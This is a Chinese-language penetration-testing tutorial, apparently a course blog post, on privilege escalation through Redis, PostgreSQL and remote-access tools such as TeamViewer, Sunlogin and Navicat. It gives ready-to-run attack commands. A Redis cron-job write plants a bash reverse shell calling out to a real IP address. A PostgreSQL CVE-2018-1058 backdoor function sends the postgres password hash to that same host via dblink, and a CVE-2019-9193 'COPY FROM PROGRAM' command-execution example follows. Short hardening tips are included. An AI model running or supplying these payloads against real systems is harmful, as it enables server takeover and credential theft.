![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/7d49c19a3acec1485c619e2a12a1f216.png)
知识点梳理
#知识点:
1、数据库提权-Redis&PostgreSQL等
2、第三方提权-TV&向日葵&Navicat等
#思考点:
1、如何判断采用什么数据库提权?
2、数据库提权首要条件密码获取?
3、有那些数据库类型可以进行提权?
4、操作系统在数据库提权中有那些疑问?
#章节点:
1、Web权限提升
2、系统权限提升
3、域控权限提升
#详细点:
1、具体有哪些权限需要我们了解掌握的?
后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等
2、以上常见权限获取方法简要归类说明?
后台权限:SQL注入,数据库备份泄露,默认或弱口令等获取帐号密码进入
网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell
数据库权限:SQL注入,数据库备份泄露,默认或弱口令等进入或网站权限获取后转入
接口权限:SQL注入,数据库备份泄露,源码泄漏,培植不当等或网站权限获取后转入
系统权限:高危系统漏洞直达或网站权限提升转入、数据库权限提升转入,第三方转入等
域控权限:高危系统漏洞直达或内网横向渗透转入,域控其他服务安全转入等
3、以上常见权限获取后能操作的具体事情?
后台权限:
常规WEB界面文章分类等操作,后台功能可操作类
网站权限:
查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等),还能收集服务器操作系统相关的信息,为后续系统提权做准备。
数据库权限:
操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。也可以作为提升系统权限手段。
接口权限:
后台或网站权限后的获取途径:后台(修改配置信息功能点),网站权限(查看的配置文件获取),具体可以操作的事情大家自己想想。
系统权限:如同在你自己操作自己的电脑一样
域控权限:如同在你自己操作自己的虚拟机一样
案例演示
数据库-Redis数据库权限提升-计划任务
数据库-PostgreSQL数据库权限提升-漏洞
三方应用-Teamviewer&向日葵&Navivat-凭据
#数据库-Redis数据库权限提升-计划任务
连接(未授权或有密码)-利用如下方法提权
采用未授权直接利用,密码进入需获取配置文件读取
1、设置键值为反弹命令的计划任务写法
2、设置写入目录为/var/spool/cron/
3、设置写入文件名为xiaodi
4、保存执行
set x "\n* * * * * bash -i >& /dev/tcp/47.114.103.63/7788 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename xiaodi
save
参考:https://blog.csdn.net/fly_hps/article/details/80937837
(1).利用计划任务执行命令反弹shell
(2).写ssh-keygen公钥然后使用私钥登陆
(3).权限较低往web物理路径写webshell
修复方案:
注意:以下操作,均需重启 Redis 后才能生效。
绑定需要访问数据库的IP。 将127.0.0.1修改为需要访问此数据库的IP地址。
设置访问密码。在 Redis.conf中requirepass 字段后,设置添加访问密码。
修改Redis服务运行账号。以较低权限账号运行Redis服务,禁用账号的登录权限。
#数据库-PostgreSQL数据库权限提升-漏洞
PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。
提权利用的是漏洞:CVE-2018-1058 CVE-2019-9193
连接-利用漏洞-执行-提权
参考:https://vulhub.org/#/environments/postgres/
修复方案:升级版本或打上补丁
-CVE-2018-1058
1、普通用户植入后门命令
CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
select dblink_connect((select 'hostaddr=47.114.103.63 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres')));
SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;
2、管理员操作数据库触发
docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub
-CVE-2019-9193
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
#三方应用-Teamviewer&向日葵&Navivat-凭据
远控类:Teamviewer 向日葵 Todesk VNC Radmin 等
密码类:各大浏览器 Xshell Navicat 3389 等
服务类:FileZilla Serv-u Zend等
演示:
1、用户:Teamviewer
2、Web用户:向日葵
3、用户:Navicat